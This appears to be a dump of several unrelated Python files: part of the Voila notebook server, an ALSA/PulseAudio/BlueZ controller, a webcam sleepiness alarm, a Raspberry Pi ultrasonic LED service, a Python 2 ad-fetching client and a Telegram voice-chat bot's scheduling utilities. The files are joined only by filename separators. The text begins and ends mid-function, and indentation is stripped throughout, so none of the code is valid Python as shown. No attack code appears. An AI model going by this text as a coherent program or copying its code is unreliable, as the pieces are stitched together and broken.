arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# but that cli config has preference, so we overwrite with that
self.update_config(self.cli_config)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
collect_template_paths(
self.nbconvert_template_paths,
self.static_paths,
self.template_paths,
self.voila_configuration.template)
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('nbconvert template paths:\n\t%s', '\n\t'.join(self.nbconvert_template_paths))
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_manager = MappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
allowed_message_types=[
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
}
)
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler),
(url_path_join(self.server_url, r'/voila/tree' + path_regex), VoilaTreeHandler),
(url_path_join(self.server_url, r'/voila/render' + notebook_path_regex), VoilaHandler,
{
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
self.kernel_manager.shutdown_all()
def listen(self):
self.app.listen(self.port)
self.log.info('Voila is running at:\n%s' % self.display_url)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
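# Illustrative command lines (a sketch based on the flags and aliases defined above,
# not part of the original module; the directory path is a placeholder):
#   voila example.ipynb --port 8888                 # serve a single notebook
#   voila --no-browser --template=default ./books/  # serve a directory without opening a browser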
|
system_controller.py
|
import alsaaudio
import pulsectl
import threading
from config import TEST_ENV
import pydbus
import time
class SystemController():
def __init__(self):
self.system_volume = alsaaudio.Mixer().getvolume()[0]
def get_volume(self):
return self.system_volume
def set_volume(self, vol):
th = threading.Thread(target=self.__set_system_volume, args=(vol,))
th.start()
self.system_volume = vol
def __set_system_volume(self, vol):
m = alsaaudio.Mixer()
m.setvolume(vol)
class Audioctl():
def __init__(self):
self.pulse = pulsectl.Pulse('my-client-name')
def get_audio_output_devices(self):
result = self.pulse.sink_list()
output_devices = []
for path in result:
output_devices.append({'name': path.description, 'index' : path.index, 'connected' : True})
return output_devices
def select(self, device):
result = self.pulse.sink_input_list()
for path in result:
self.pulse.sink_input_move(path.index ,device['index'])
class Bluetoothctl():
def __init__(self):
self.bluez_service = 'org.bluez'
self.adapter_path = '/org/bluez/hci0'
self.bus = pydbus.SystemBus()
self.adapter = self.bus.get(self.bluez_service, self.adapter_path)
self.mngr = self.bus.get(self.bluez_service, '/')
def get_paired_devices(self):
return self.get_devices('Paired')
def get_connected_devices(self):
return self.get_devices('Connected')
def get_devices(self, filter):
mngd_objs = self.mngr.GetManagedObjects()
paired_devices = []
for path in mngd_objs:
con_state = mngd_objs[path].get('org.bluez.Device1', {}).get(filter, False)
if con_state:
addr = mngd_objs[path].get('org.bluez.Device1', {}).get('Address')
icon = mngd_objs[path].get('org.bluez.Device1', {}).get('Icon')
connected = mngd_objs[path].get('org.bluez.Device1', {}).get('Connected')
name = ('[o] ' if connected else '[ ] ') + mngd_objs[path].get('org.bluez.Device1', {}).get('Name')
paired_devices.append({'name': name, 'mac_address' : addr, 'icon' : icon, 'connected' : connected})
return paired_devices
def toggle(self, device):
if(device['connected']):
print(device['name'] + " was connected. Disconnecting")
return self.disconnect(device['mac_address'])
        else:
print(device['name'] + " was disconnected. Connecting")
return self.connect(device['mac_address'])
def disconnect(self, mac_address):
device_path = f"{self.adapter_path}/dev_{mac_address.replace(':', '_')}"
device = self.bus.get(self.bluez_service, device_path)
device.Disconnect()
def connect(self, mac_address):
device_path = f"{self.adapter_path}/dev_{mac_address.replace(':', '_')}"
device = self.bus.get(self.bluez_service, device_path)
device.Connect()
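# Hypothetical usage sketch (not part of the original module): list the paired BlueZ
# devices and route the currently playing PulseAudio streams to the first reported sink.
if __name__ == '__main__':
    bt = Bluetoothctl()
    for dev in bt.get_paired_devices():
        print(dev['name'], dev['mac_address'])
    audio = Audioctl()
    outputs = audio.get_audio_output_devices()
    if outputs:
        audio.select(outputs[0])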
|
alarmSpeaker.py
|
""" alarmSleaker.py
Summay:
Alarm sleaker.
"""
import os
import cv2
import wave
import pyaudio
import random
import threading
from detectionSleepiness import DetectionSleepiness
class AlarmSpeaker:
""" AlarmSpeaker. """
# Sound path.
__SOUNDS_DIR = "./sounds"
def __init__(self):
""" Init constructor.
"""
self.__isRunning = False
self.__speakerThreadObj = None
self.__checkSleepinessThreadObj = None
def __del__(self):
""" Destructor.
"""
self.stopThread()
def goOff(self):
""" Go off the alarm.
"""
self.stopThread()
self.startThread()
def startThread(self):
""" Start SpeakerThread and CheckSleepinessThread.
"""
self.__isRunning = True
if self.__speakerThreadObj is None:
self.__speakerThreadObj = threading.Thread(target=self.__speakerThread)
self.__speakerThreadObj.start()
if self.__checkSleepinessThreadObj is None:
self.__checkSleepinessThreadObj = threading.Thread(target=self.__checkSleepinessThread)
self.__checkSleepinessThreadObj.start()
def stopThread(self):
""" Stop SpeakerThread and CheckSleepinessThread.
"""
self.__isRunning = False
if self.__speakerThreadObj is not None:
self.__speakerThreadObj.join()
self.__speakerThreadObj = None
if self.__checkSleepinessThreadObj is not None:
self.__checkSleepinessThreadObj.join()
self.__checkSleepinessThreadObj = None
def __checkSleepinessThread(self):
""" Check sleepiness form the camera.
"""
infApp = DetectionSleepiness()
camera = cv2.VideoCapture(0)
while self.__isRunning:
_, frame = camera.read()
            if not infApp.isSleepy(frame):
                self.__isRunning = False
        camera.release()
def __speakerThread(self):
""" Continue to sound music until stopped status.
"""
sound = self.__SOUNDS_DIR + "/" + random.choice(os.listdir(self.__SOUNDS_DIR))
while self.__isRunning:
wf = wave.open(sound, "r")
audio = pyaudio.PyAudio()
stream = audio.open(format=audio.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
data = wf.readframes(1024)
while data != b'' and self.__isRunning:
stream.write(data)
data = wf.readframes(1024)
stream.stop_stream()
stream.close()
audio.terminate()
wf.close()
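# Hypothetical usage sketch (not part of the original module): trigger the alarm and keep
# the process alive; the alarm stops itself once the camera no longer detects sleepiness,
# and stopThread() joins both worker threads on the way out.
if __name__ == "__main__":
    alarm = AlarmSpeaker()
    alarm.goOff()
    input("Alarm running, press Enter to stop...")
    alarm.stopThread()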
|
LedService.py
|
import argparse
import multiprocessing
import time
from rpi_ws281x import *
from LEDMEthods import *
import RPi.GPIO as GPIO
from threading import Thread
# LED strip configuration:
LED_COUNT = 120 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
# LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# threads
exitFlag = 0
mutex = multiprocessing.Lock()
class MyList:
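    """Rolling window of the last three distance readings; avg() smooths out a single bad echo."""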
def __init__(self):
self.firstValue = 1000
self.secondValue = 1000
self.thirdValue = 1000
def avg(self):
return (self.firstValue + self.secondValue + self.thirdValue) / 3
def nextValue(self, newValue):
self.thirdValue = self.secondValue
self.secondValue = self.firstValue
self.firstValue = newValue
def distanceProcess(GPIO_Trigger, GPIO_Echo, GPIO_Trigger2, GPIO_Echo2, eventLong, eventShort, reportTime, triggerDistance1,
triggerDistance2):
# GPIO Mode (BOARD / BCM)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(GPIO_Trigger, GPIO.OUT)
GPIO.setup(GPIO_Echo, GPIO.IN)
GPIO.setup(GPIO_Trigger2, GPIO.OUT)
GPIO.setup(GPIO_Echo2, GPIO.IN)
try:
list1 = MyList()
list2 = MyList()
while True:
# set Trigger to HIGH
GPIO.output(GPIO_Trigger2, True)
# set Trigger after 0.01ms to LOW
time.sleep(0.00001)
GPIO.output(GPIO_Trigger2, False)
StartTime2 = time.time()
StopTime2 = time.time()
# save StartTime
while GPIO.input(GPIO_Echo2) == 0:
StartTime2 = time.time()
# save time of arrival
while GPIO.input(GPIO_Echo2) == 1:
StopTime2 = time.time()
# time difference between start and arrival
TimeElapsed2 = StopTime2 - StartTime2
# multiply with the sonic speed (34300 cm/s)
# and divide by 2, because there and back
distance2 = (TimeElapsed2 * 34300) / 2
list2.nextValue(distance2)
if(list2.avg()<100):
eventLong.set()
else:
eventLong.clear()
##############
# set Trigger to HIGH
GPIO.output(GPIO_Trigger, True)
# set Trigger after 0.01ms to LOW
time.sleep(0.00001)
GPIO.output(GPIO_Trigger, False)
StartTime = time.time()
StopTime = time.time()
# save StartTime
while GPIO.input(GPIO_Echo) == 0:
StartTime = time.time()
# save time of arrival
while GPIO.input(GPIO_Echo) == 1:
StopTime = time.time()
# time difference between start and arrival
TimeElapsed = StopTime - StartTime
# multiply with the sonic speed (34300 cm/s)
# and divide by 2, because there and back
distance = (TimeElapsed * 34300) / 2
list1.nextValue(distance)
if (list1.avg() < 100):
eventShort.set()
else:
eventShort.clear()
time.sleep(0.01)
except (RuntimeError, KeyboardInterrupt) as e:
print("watek padl zamkniety dostep do GPIO")
print('blad: ',str(e))
GPIO.cleanup() # reset all GPIO
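# Illustrative helper (not called by the main loop below): the HC-SR04 measurement that
# distanceProcess() performs inline, condensed into one function. It assumes the trigger
# and echo pins were already configured with GPIO.setup(). A ~10 us pulse on the trigger
# starts a reading; the echo pin stays high for the ultrasonic round trip, so
# distance = elapsed_time * 34300 cm/s / 2.
def measure_distance_cm(trigger_pin, echo_pin):
    GPIO.output(trigger_pin, True)
    time.sleep(0.00001)
    GPIO.output(trigger_pin, False)
    start = stop = time.time()
    while GPIO.input(echo_pin) == 0:
        start = time.time()
    while GPIO.input(echo_pin) == 1:
        stop = time.time()
    return ((stop - start) * 34300) / 2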
if __name__ == '__main__':
TIME_FOR_LIGHT_Sec = 10
TIME_FOR_SILENCE_Sec = 5
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')
args = parser.parse_args()
# Create NeoPixel object with appropriate configuration.
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
    # Initialize the library (must be called once before other functions).
strip.begin()
print('Press Ctrl-C to quit.')
if not args.clear:
print('Use "-c" argument to clear LEDs on exit')
try:
thread_safe = False
is_blinding = False
timeStart = time.time()
eventLong = multiprocessing.Event()
eventShort = multiprocessing.Event()
p = multiprocessing.Process(target=distanceProcess, args=(38, 37, 16, 15, eventLong, eventShort, 1000, 100, 100,))
p.start()
while True:
stateLong =eventLong.is_set()
stateShort = eventShort.is_set()
shortLed = Thread(target=processData, args=(strip, Color(255, 120, 33), 40, False, thread_safe, mutex))
if stateShort and not is_blinding:
colorWipeLumen(strip, 10)
shortLed.start()
is_blinding = True
timeStart = time.time()
if shortLed.is_alive():
print("Wątek sonic żyje")
time.sleep(1)
else:
print("Wątek sonic leży")
elif stateShort and is_blinding and (time.time() - timeStart > TIME_FOR_SILENCE_Sec):
time.sleep(0.5)
timeStart = time.time()
shortLed.start()
##long
longLed = Thread(target=processData, args=(strip, Color(255, 120, 133), 40, True, thread_safe, mutex))
if (stateLong) and not is_blinding:
colorWipeLumen(strip, 10)
longLed.start()
is_blinding = True
timeStart = time.time()
if longLed.is_alive():
print("Wątek ir żyje")
time.sleep(1)
else:
print("Wątek ir leży")
elif (stateLong) and is_blinding and (time.time() - timeStart > TIME_FOR_SILENCE_Sec):
timeStart = time.time()
if longLed.is_alive():
time.sleep(0.5)
else:
longLed = Thread(target=processData, args=(strip, Color(255, 120, 133), 40, True, thread_safe, mutex))
longLed.start()
is_blinding = True
print("przed wylączaniem")
if is_blinding & ((time.time() - timeStart) > TIME_FOR_LIGHT_Sec):
if longLed.is_alive() or shortLed.is_alive():
print("zaczekam az czas sie skonczy")
time.sleep(0.1)
                elif (time.time() - timeStart) > TIME_FOR_LIGHT_Sec and is_blinding:
                    print("time is up, switching off")
                    print((time.time() - timeStart) > TIME_FOR_LIGHT_Sec and is_blinding)
print((time.time() - timeStart))
colorWipeDimming(strip, 15)
is_blinding = False
time.sleep(0.4)
except (RuntimeError, KeyboardInterrupt):
print('Exception')
time.sleep(1000.0 / 1000.0)
if longLed.is_alive():
longLed.join()
if shortLed.is_alive():
shortLed.join()
t3 = Thread(target=processData, args=(strip, Color(0, 0, 0), 0.005, True, thread_safe, mutex))
t3.start()
finally:
#GPIO.cleanup() # reset all GPIO
print("Program ended")
|
ad_service.py
|
#!/usr/bin/python
from collections import deque
import time
from ad_req_interface import AdReqInterface
import urllib2, urllib
import threading
import uuid
import os
import json
class HttpReq(object):
def __init__(self, type, url="http://xssp.maxbit.cn/adapi/ad/getAd"):
self.__MAX_TIMES = 2
self.__REQ_INTERVAL = 2
self.__last_req_ts = 0
self.__req_times = 0
self.__type = type
self.__timeout = 1
self.__url = url
self.__req_done = False
self._app_id = '500098'
self._pic_slot = '100055'
self._video_slot = ''
self._ad_time = '10'
self._dev_id = ''
self._api_ver = '1.5'
def _set_req_done(self):
print '_set_req_done() _req_done = True'
self.__req_done = True
def set_max_times(self, t):
self.__MAX_TIMES =t
def set_req_interval(self, i):
self.__REQ_INTERVAL = i
def __update_last_req_ts(self):
self.__last_req_ts = int(time.time())
def __update_req_times(self):
self.__req_times += 1
def __update_request_counter(self):
self.__update_last_req_ts()
self.__update_req_times()
def set_req_timeout(self, to):
self.__timeout = to
def get_req_timeout(self):
return self.__timeout
""" whether req node need re-add to queue """
def need_redo(self):
if self.__req_done:
return False
if self.__req_times >= self.__MAX_TIMES:
return False
return True
def get_type(self):
return self.__type
def get_url(self):
return self.__url
def _do_request(self):
raise Exception("this is method should override by subclass")
def exec_http_req(self):
''' compare req interval '''
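        # Throttle: if the previous attempt was made within __REQ_INTERVAL seconds, skip
        # this one; exec_loop() re-queues the node via need_redo() until it succeeds or
        # the retry budget (__MAX_TIMES) is exhausted.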
cur_ts = int(time.time())
dts = cur_ts - self.__last_req_ts
if dts <= self.__REQ_INTERVAL:
return None
ret = self._do_request()
self.__update_request_counter()
return ret
class AdInfo(object):
def __init__(self):
self.__ad_url = None
self.__ad_width = None
self.__ad_height = None
self.__ad_cb_list = []
self.__ad_type = None
self.__ad_media_name = None
self.__create_time = int(time.time())
self.__VALID_INTERVAL = 60
def set_ad_url(self, u):
self.__ad_url = u
if not u:
return
if len(u) <= 4:
return
index = u.rfind('/')
if index < 0:
return
name = u[index + 1:len(u)]
self.__ad_media_name = os.path.join('/tmp/daily/index/08/pb/data/',str(name))
def set_ad_type(self, t):
self.__ad_type = t
def get_ad_type(self):
return self.__ad_type
def set_ad_cb_add(self, l):
self.__ad_cb_list.append(l)
def get_ad_url(self):
return self.__ad_url
def get_ad_cb_list(self):
return self.__ad_cb_list
def get_ad_media_name(self):
return self.__ad_media_name
def valid(self):
""" file doesn't exist - invalid """
if not os.path.exists(self.__ad_media_name):
print 'ad_service, file:%s' % self.__ad_media_name, ' does not exist'
return False
""" difficult time > 60s - invalid """
ct = int(time.time())
dt = ct - self.__create_time
if dt > self.__VALID_INTERVAL:
return False
return True
class AdRequest(HttpReq):
def __init__(self, dev_id, city_id, type='pic'):
super(AdRequest, self).__init__(type='REQUEST')
self.__type = type
self.__dev_id = dev_id
self.__city_id = city_id
self.__params = {}
self.__params['id'] = str(uuid.uuid4())
self.__params['app_id'] = self._app_id
self.__params['adslot_id'] = self._pic_slot
self.__params['api_version'] = self._api_ver
self.__params['ad_time'] = self._ad_time
self.__params['device'] = self.__generate_dev_info()
self.__params['gps'] = self.__generate_gps_info()
self.__params['network'] = self.__generate_network_info()
self.__params['media'] = self.__generate_media_info()
def __generate_media_info(self):
media={}
media['channel'] = 'None'
media['tags'] = 'None'
return media
def __generate_gps_info(self):
gps={}
gps['lon'] = float(0.0)
gps['lat'] = float(0.0)
gps['timestamp'] = long(time.time())
gps['city_code'] = int(self.__city_id)
return gps
def __generate_network_info(self):
network = {}
network['connection_type'] = 'UNKNOWN_NETWORK'
network['operator_type'] = 'ISP_UNKNOWN'
network['ipv4'] = '192.168.0.1'
return network
def __generate_dev_info(self):
device = {}
device['device_id'] = self.__dev_id
device['vendor'] = 'rmrb'
device['model'] = '2s'
device['screen_width'] = int(768)
device['screen_height'] = int(1330)
device['os_type'] = 'UNKNOWN'
device['os_version'] = '11.04'
return device
def _parse_json(self, js):
response = AdInfo()
while True:
try:
retJs = json.loads(js)
# retJs = json.dumps(js)
dataJs = retJs['data']
dataList = list(dataJs)
lSize = len(dataList)
dataJs = dataList[0]
mediaUrl = dataJs['ad_url']
response.set_ad_url(mediaUrl)
mediaType = dataJs['ad_type']
response.set_ad_type(mediaType)
except Exception, e:
                print ' _parse_json, excp:%s' % e.message
try:
cb_url = dataJs['callback_url']
for l in cb_url:
response.set_ad_cb_add(l)
except Exception, e:
print ' _parse_json callback_url, excp:%s' % e.message
try:
cb_url = dataJs['third_monitor_url']
for l in cb_url:
response.set_ad_cb_add(l)
except Exception, e1:
print ' _parse_json third_monitor_url, excp:%s' % e1.message
break
return response
def _do_request(self):
import json
ad_info = None
jsObj = json.dumps(self.__params)
# print 'adrequest json:%s' % jsObj
con = None
res = None
# print 'req json:%s' % jsObj
try:
req = urllib2.Request(self.get_url(), jsObj.decode('utf8'), {'Content-Type': 'application/json'})
con = urllib2.urlopen(req)
res = con.read()
except urllib2.HTTPError, e:
print ' req excp:', e.message
if con and con.code == 200 and res and len(res) > 0:
print " success to request ad, response:\n>>>>\n%s<<<<<" % res
ad_info = self._parse_json(res)
if ad_info:
self._set_req_done()
else:
print " failed to request ad, err code:%s\n" % con.code
return ad_info
class AdCallback(HttpReq):
def __init__(self, url):
super(AdCallback, self).__init__('RESPONSE', url)
def _do_request(self):
        print 'In AdCallback._do_request().'
try:
url = self.get_url()
con = urllib2.urlopen(url)
if con and con.code == 200:
self._set_req_done()
except urllib2.HTTPError, e:
print ' req excp:', e.message
return None
class AdServer(AdReqInterface):
def __init__(self):
""" work queue, write to left, read from right"""
self.__work_queue = deque()
""" ad result, write to left, read from right"""
self.__ad_pic_queue = deque()
self.__work_queue_lock = threading.Condition()
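        # Producer/consumer layout: load_picture() enqueues AdRequest objects on the work
        # queue, exec_loop() (run in a background thread by run_ad_service()) pops and
        # executes them, and successful responses are stored on the picture queue as
        # AdInfo objects for obtain_picture() to consume.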
self.__dev_id = None
self.__city_id = None
self.detect_id()
def detect_id(self):
f_path = '/tmp/daily/index/id.ini'
if os.path.exists(f_path):
f = open(f_path, 'r')
id = f.readline()
id = id.replace('\n', '')
self.__dev_id = id
""""shanghai huang-pu"""
self.__city_id = "310101"
def __add_pic(self, n):
self.__ad_pic_queue.appendleft(n)
def __get_pic(self):
if len(self.__ad_pic_queue) == 0:
return None
else:
return self.__ad_pic_queue.pop()
def __add_req(self, n):
if not self.__work_queue_lock.acquire(False):
            print ' AdServer.__add_req failed to obtain mutex lock'
return
if isinstance(n, HttpReq):
self.__work_queue.appendleft(n)
self.__work_queue_lock.notify(1)
self.__work_queue_lock.release()
def __get_req(self):
if len(self.__work_queue) == 0:
return None
else:
return self.__work_queue.pop()
def obtain_picture(self):
path = None
while len(self.__ad_pic_queue) > 0:
adObj = self.__ad_pic_queue.pop()
if not adObj.valid():
continue
""" add ad callback to work queue """
cb_list = adObj.get_ad_cb_list()
for url in cb_list:
cb = AdCallback(url)
self.__add_req(cb)
path = adObj.get_ad_media_name()
break
""" return ad picture name usually md5value of pic """
return path
def obtain_video(self):
pass
def load_picture(self):
""" create a new adRequest obj, add to work queue"""
n = AdRequest(self.__dev_id, self.__city_id, 'pic')
self.__add_req(n)
def load_video(self):
""" create a new adRequest obj, add to work queue"""
# n = AdRequest("http://pricloud.cn", 'video')
# self.__add_req(n)
pass
def exec_loop(self):
while True:
try:
self.__work_queue_lock.acquire(True)
while len(self.__work_queue) == 0:
print 'queue empty, wait here'
self.__work_queue_lock.wait(3)
self.__work_queue_lock.release()
ele = self.__get_req()
if not isinstance(ele, HttpReq):
continue
m_info = ele.exec_http_req()
if m_info and isinstance(m_info, AdInfo):
if 'IMAGE' in m_info.get_ad_type():
self.__add_pic(m_info)
if ele.need_redo():
self.__add_req(ele)
except Exception, e:
print ' AdServer.exec_loop() excp: ', e.message
time.sleep(.05)
def run_ad_service():
ad_server = AdServer()
threading.Thread(target=ad_server.exec_loop).start()
return ad_server
""" test """
def test():
ad_server = run_ad_service()
while True:
print 'call load_picture()'
ad_server.load_picture()
time.sleep(5)
print 'call obtain_picture()'
name = ad_server.obtain_picture()
print 'obtain picture name:%s' % name
time.sleep(30)
#test()
|
utils.py
|
from logger import LOGGER
try:
from pyrogram.raw.types import InputChannel
from wrapt_timeout_decorator import timeout
from apscheduler.schedulers.asyncio import AsyncIOScheduler
from apscheduler.jobstores.mongodb import MongoDBJobStore
from apscheduler.jobstores.base import ConflictingIdError
from pyrogram.raw.functions.channels import GetFullChannel
from pytgcalls import StreamType
from youtube_dl import YoutubeDL
from pyrogram import filters
from pymongo import MongoClient
from datetime import datetime
from threading import Thread
from config import Config
from asyncio import sleep
from bot import bot
import subprocess
import asyncio
import random
import re
import ffmpeg
import json
import time
import sys
import os
import math
from pyrogram.errors.exceptions.bad_request_400 import (
BadRequest,
ScheduleDateInvalid
)
from pytgcalls.types.input_stream import (
AudioVideoPiped,
AudioPiped,
AudioImagePiped
)
from pytgcalls.types.input_stream import (
AudioParameters,
VideoParameters
)
from pyrogram.types import (
InlineKeyboardButton,
InlineKeyboardMarkup,
Message
)
from pyrogram.raw.functions.phone import (
EditGroupCallTitle,
CreateGroupCall,
ToggleGroupCallRecord,
StartScheduledGroupCall
)
from pytgcalls.exceptions import (
GroupCallNotFound,
NoActiveGroupCall,
InvalidVideoProportion
)
from PIL import (
Image,
ImageFont,
ImageDraw
)
from user import (
group_call,
USER
)
except ModuleNotFoundError:
import os
import sys
import subprocess
file=os.path.abspath("requirements.txt")
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-r', file, '--upgrade'])
os.execl(sys.executable, sys.executable, *sys.argv)
if Config.DATABASE_URI:
from database import db
monclient = MongoClient(Config.DATABASE_URI)
jobstores = {
'default': MongoDBJobStore(client=monclient, database=Config.DATABASE_NAME, collection='scheduler')
}
scheduler = AsyncIOScheduler(jobstores=jobstores)
else:
scheduler = AsyncIOScheduler()
scheduler.start()
async def play():
song=Config.playlist[0]
if song[3] == "telegram":
file=Config.GET_FILE.get(song[5])
if not file:
await download(song)
while not file:
await sleep(1)
file=Config.GET_FILE.get(song[5])
LOGGER.info("Downloading the file from TG")
while not os.path.exists(file):
await sleep(1)
elif song[3] == "url":
file=song[2]
else:
file=await get_link(song[2])
if not file:
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return False
link, seek, pic, width, height = await chek_the_media(file, title=f"{song[1]}")
if not link:
LOGGER.warning("Unsupported link, Skiping from queue.")
return
await sleep(1)
if Config.STREAM_LINK:
Config.STREAM_LINK=False
await join_call(link, seek, pic, width, height)
async def schedule_a_play(job_id, date):
try:
scheduler.add_job(run_schedule, "date", [job_id], id=job_id, run_date=date, max_instances=50, misfire_grace_time=None)
except ConflictingIdError:
LOGGER.warning("This already scheduled")
return
if not Config.CALL_STATUS or not Config.IS_ACTIVE:
if Config.SCHEDULE_LIST[0]['job_id'] == job_id \
and (date - datetime.now()).total_seconds() < 86400:
song=Config.SCHEDULED_STREAM.get(job_id)
if Config.IS_RECORDING:
scheduler.add_job(start_record_stream, "date", id=str(Config.CHAT), run_date=date, max_instances=50, misfire_grace_time=None)
try:
await USER.send(CreateGroupCall(
peer=(await USER.resolve_peer(Config.CHAT)),
random_id=random.randint(10000, 999999999),
schedule_date=int(date.timestamp()),
title=song['1']
)
)
Config.HAS_SCHEDULE=True
except ScheduleDateInvalid:
LOGGER.error("Unable to schedule VideoChat, since date is invalid")
except Exception as e:
LOGGER.error(f"Error in scheduling voicechat- {e}")
await sync_to_db()
async def run_schedule(job_id):
data=Config.SCHEDULED_STREAM.get(job_id)
if not data:
LOGGER.error("The Scheduled stream was not played, since data is missing")
        old=list(filter(lambda k: k['job_id'] == job_id, Config.SCHEDULE_LIST))
        for old_ in old:
            Config.SCHEDULE_LIST.remove(old_)
        await sync_to_db()
else:
if Config.HAS_SCHEDULE:
if not await start_scheduled():
LOGGER.error("Scheduled stream skipped, Reason - Unable to start a voice chat.")
return
data_ = [{1:data['1'], 2:data['2'], 3:data['3'], 4:data['4'], 5:data['5']}]
Config.playlist = data_ + Config.playlist
await play()
LOGGER.info("Starting Scheduled Stream")
del Config.SCHEDULED_STREAM[job_id]
old=list(filter(lambda k: k['job_id'] == job_id, Config.SCHEDULE_LIST))
if old:
for old_ in old:
Config.SCHEDULE_LIST.remove(old_)
if not Config.SCHEDULE_LIST:
Config.SCHEDULED_STREAM = {} #clear the unscheduled streams
await sync_to_db()
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def cancel_all_schedules():
for sch in Config.SCHEDULE_LIST:
job=sch['job_id']
k=scheduler.get_job(job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
if Config.SCHEDULED_STREAM.get(job):
del Config.SCHEDULED_STREAM[job]
Config.SCHEDULE_LIST.clear()
await sync_to_db()
LOGGER.info("All the schedules are removed")
async def skip():
if Config.STREAM_LINK and len(Config.playlist) == 0 and Config.IS_LOOP:
        await stream_from_link(Config.STREAM_LINK)
return
elif not Config.playlist \
and Config.IS_LOOP:
LOGGER.info("Loop Play enabled, switching to STARTUP_STREAM, since playlist is empty.")
await start_stream()
return
elif not Config.playlist \
and not Config.IS_LOOP:
LOGGER.info("Loop Play is disabled, leaving call since playlist is empty.")
await leave_call()
return
